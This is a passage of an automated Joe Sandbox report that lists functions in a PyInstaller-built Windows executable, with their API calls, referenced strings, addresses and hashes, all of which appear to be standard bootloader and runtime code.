Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: eff3923cdb6c4b0662751dc40b002594df551f5b4d6dd6d6a184f9f4b5f3aea2
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: D8314B21B1E64691EB52AB92A800675A694BB5CBA0FD94539ED2D0B3C0FF7CE44493F0

Function 00007FF7FD736350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7FD7363F7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7FD736446
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7FD7363B7
Failed to load Python DLL '%ls'., xrefs: 00007FF7FD736497
LoadLibrary, xrefs: 00007FF7FD73649E
ucrtbase.dll, xrefs: 00007FF7FD7363CD

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: c6b32316bfe7a0aff6899d53276924ef6fe1744c5bc58fcca4aca07baf8add6e
Instruction ID: 6e40397a80faad9a1e598ca258a429e9e72f6890a0ab0399900d195fa0a75ab1
Opcode Fuzzy Hash: c6b32316bfe7a0aff6899d53276924ef6fe1744c5bc58fcca4aca07baf8add6e
Instruction Fuzzy Hash: B0415E22A0CA8691EB15EB61E4542EEA311FB48344FC00132EA6D4B6D5FF7CE615D3F1

Function 00007FF7FD732A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7FD73351A,?,00000000,00007FF7FD733F23), ref: 00007FF7FD732AA0

Strings

0, xrefs: 00007FF7FD732B16
[PYI-%d:%s] , xrefs: 00007FF7FD732AA8
WARNING, xrefs: 00007FF7FD732AAF
Warning, xrefs: 00007FF7FD732B1E
Warning [ANSI Fallback], xrefs: 00007FF7FD732B0F

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 14bc5a6cd879b9803674c9eeb4686172a80c10bf2b308abc5c8668c6af06d2b1
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 4821713261C78192E721EB51B4417EAA394BB88784F800136EE9C47699EF7CD145C7E0

Function 00007FF7FD74B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7FD74B1CF
FlsGetValue.KERNEL32 ref: 00007FF7FD74B1E4
FlsSetValue.KERNEL32 ref: 00007FF7FD74B205
FlsSetValue.KERNEL32 ref: 00007FF7FD74B232
FlsSetValue.KERNEL32 ref: 00007FF7FD74B243
FlsSetValue.KERNEL32 ref: 00007FF7FD74B254
SetLastError.KERNEL32 ref: 00007FF7FD74B26F

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: 6bfedc1bbe639b133588f0ceca2927ffe76c4f47bcb35bec2a89459393a2f88e
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: 57213920E0C246C2FB5A7761565923DD1425F8E7A0FD48735D93E4EAD6FE2CA80183F1

Function 00007FF7FD757DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7FD757E0D
GetLastError.KERNEL32 ref: 00007FF7FD757E19
CloseHandle.KERNEL32 ref: 00007FF7FD757E31
CreateFileW.KERNEL32 ref: 00007FF7FD757E5C
WriteConsoleW.KERNEL32 ref: 00007FF7FD757E7B

Strings

CONOUT$, xrefs: 00007FF7FD757E3D

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 173ae3f808d5160a0e7243244d194ea904644b90e2e3f4b1c148576fc0b78408
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: AD11602161CA4186E350AB52A854339A3A0BB8CBA4F804234D96D8B7D4EF3DD81487F1

Function 00007FF7FD738560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7FD739216), ref: 00007FF7FD738592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7FD739216), ref: 00007FF7FD7385E9

Part of subcall function 00007FF7FD739400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FD7345E4,00000000,00007FF7FD731985), ref: 00007FF7FD739439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FD739216), ref: 00007FF7FD738678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FD739216), ref: 00007FF7FD7386E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF7FD739216), ref: 00007FF7FD7386F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF7FD739216), ref: 00007FF7FD73870A

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: aa37ace332cee11116c47d9c07481ae31c36c9cb126c9be809467fbb96ae743c
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 3B41A362B1C68281EB20AB11A4406AAE395FB88BC4F840031DE6D5B7C9EE7DD401D7F0

Function 00007FF7FD74B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7FD744F81,?,?,?,?,00007FF7FD74A4FA,?,?,?,?,00007FF7FD7471FF), ref: 00007FF7FD74B347
FlsSetValue.KERNEL32(?,?,?,00007FF7FD744F81,?,?,?,?,00007FF7FD74A4FA,?,?,?,?,00007FF7FD7471FF), ref: 00007FF7FD74B37D
FlsSetValue.KERNEL32(?,?,?,00007FF7FD744F81,?,?,?,?,00007FF7FD74A4FA,?,?,?,?,00007FF7FD7471FF), ref: 00007FF7FD74B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF7FD744F81,?,?,?,?,00007FF7FD74A4FA,?,?,?,?,00007FF7FD7471FF), ref: 00007FF7FD74B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF7FD744F81,?,?,?,?,00007FF7FD74A4FA,?,?,?,?,00007FF7FD7471FF), ref: 00007FF7FD74B3CC
SetLastError.KERNEL32(?,?,?,00007FF7FD744F81,?,?,?,?,00007FF7FD74A4FA,?,?,?,?,00007FF7FD7471FF), ref: 00007FF7FD74B3E7

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 2cd65fe22efc27d77b431dd846b0db7396a78a86f4bc2b7540982fd220c0e2b6
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: F411FC20A0C642C6F75A7762565913DE1429F8E7A0FD48735D93E4E6D6FE2CE80183F1

Function 00007FF7FD732910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FD731B6A), ref: 00007FF7FD73295E

Strings

Error [ANSI Fallback], xrefs: 00007FF7FD7329FF
%s: %s, xrefs: 00007FF7FD7329E8
Error, xrefs: 00007FF7FD732A0E
[PYI-%d:ERROR] , xrefs: 00007FF7FD732966

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: d2b82ea105e690f1d5954f7e586988d1bb375cbdcf2e25e3109f54c345674537
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 9831C423A1C68192E710A765A8412F6A294BF8C7D4F804132EE9D8B795FE7CD54686F0

Function 00007FF7FD732390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7FD7323C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7FD73248E
DeleteObject.GDI32 ref: 00007FF7FD7324C1
DestroyIcon.USER32 ref: 00007FF7FD7324D3

Strings

Unhandled exception in script, xrefs: 00007FF7FD7323F8

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: 55a29bb02bacab95274dd7b88349d475a49990d8fe259c0d482f22de61c6afe4
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 9A317372A0C68189EB20EF21E8552F9A350FF8D784F840135EA5D4BB99EF7CD104C7A1

Function 00007FF7FD732B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7FD73918F,?,00007FF7FD733C55), ref: 00007FF7FD732BA0
MessageBoxW.USER32 ref: 00007FF7FD732C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF7FD732BA8
WARNING, xrefs: 00007FF7FD732BAF
Warning, xrefs: 00007FF7FD732C1D

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: d82876520a6f320e28fa5aa9344dbab2285d7af3bc2e50385a0f2e3e78037a30
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: F721A36270CB4192E711AB55F4447EAA364EB8C784F804136EE9D5B695EE3CD205C7E0

Function 00007FF7FD732710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7FD731B99), ref: 00007FF7FD732760

Strings

Error [ANSI Fallback], xrefs: 00007FF7FD7327CF
Error, xrefs: 00007FF7FD7327DE
ERROR, xrefs: 00007FF7FD73276F
[PYI-%d:%s] , xrefs: 00007FF7FD732768

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: bfdf52e94adbb9ba7ffc703e044873d3a6815eb55dc400193b7a4a20e126f4cc
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: CA218372A1C78182E710EB51B4417EAA394FB8C384F800132EE9D47699EF7CD14587E0

Function 00007FF7FD749AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7FD749B1D
GetProcAddress.KERNEL32 ref: 00007FF7FD749B33
FreeLibrary.KERNEL32 ref: 00007FF7FD749B5A

Strings

mscoree.dll, xrefs: 00007FF7FD749B14
CorExitProcess, xrefs: 00007FF7FD749B2C

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: f2081e719303aa010a0384db56979dd3dfed0913de7d65e1c95145faec75ac59
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: 45F04F21A0DA0681EB10AB64A4597799320AF4D765F940239C67E4A6E4FF2CE445C7F0

Function 00007FF7FD7593D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7FD759400
_set_statfp.LIBCMT ref: 00007FF7FD75941B
_set_statfp.LIBCMT ref: 00007FF7FD759437
_set_statfp.LIBCMT ref: 00007FF7FD759473

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 471aa1ca724cfb991f0bc7c67f570b37dc9ca931178fa5d06677389624cb1ffb
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 58119172E5CA9301FF643124D556376A0446F5D374F844634EA7E0E2D6EF2CAD4141F6

Function 00007FF7FD74B400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7FD74A613,?,?,00000000,00007FF7FD74A8AE,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74B41F
FlsSetValue.KERNEL32(?,?,?,00007FF7FD74A613,?,?,00000000,00007FF7FD74A8AE,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74B43E
FlsSetValue.KERNEL32(?,?,?,00007FF7FD74A613,?,?,00000000,00007FF7FD74A8AE,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74B466
FlsSetValue.KERNEL32(?,?,?,00007FF7FD74A613,?,?,00000000,00007FF7FD74A8AE,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74B477
FlsSetValue.KERNEL32(?,?,?,00007FF7FD74A613,?,?,00000000,00007FF7FD74A8AE,?,?,?,?,?,00007FF7FD74A83A), ref: 00007FF7FD74B488

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: 9e31bad7c8b54e6472f299c088d1df92d9a5590aa388077ac47a5530c66b378a
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: A5113D20B0C642C1FB5AB7695659179E1415F8E7B0FD48335E93D4E6D6FE2CE80282F0

Function 00007FF7FD74B294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7FD74B2A5
FlsSetValue.KERNEL32 ref: 00007FF7FD74B2C4
FlsSetValue.KERNEL32 ref: 00007FF7FD74B2EC
FlsSetValue.KERNEL32 ref: 00007FF7FD74B2FD
FlsSetValue.KERNEL32 ref: 00007FF7FD74B30E

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
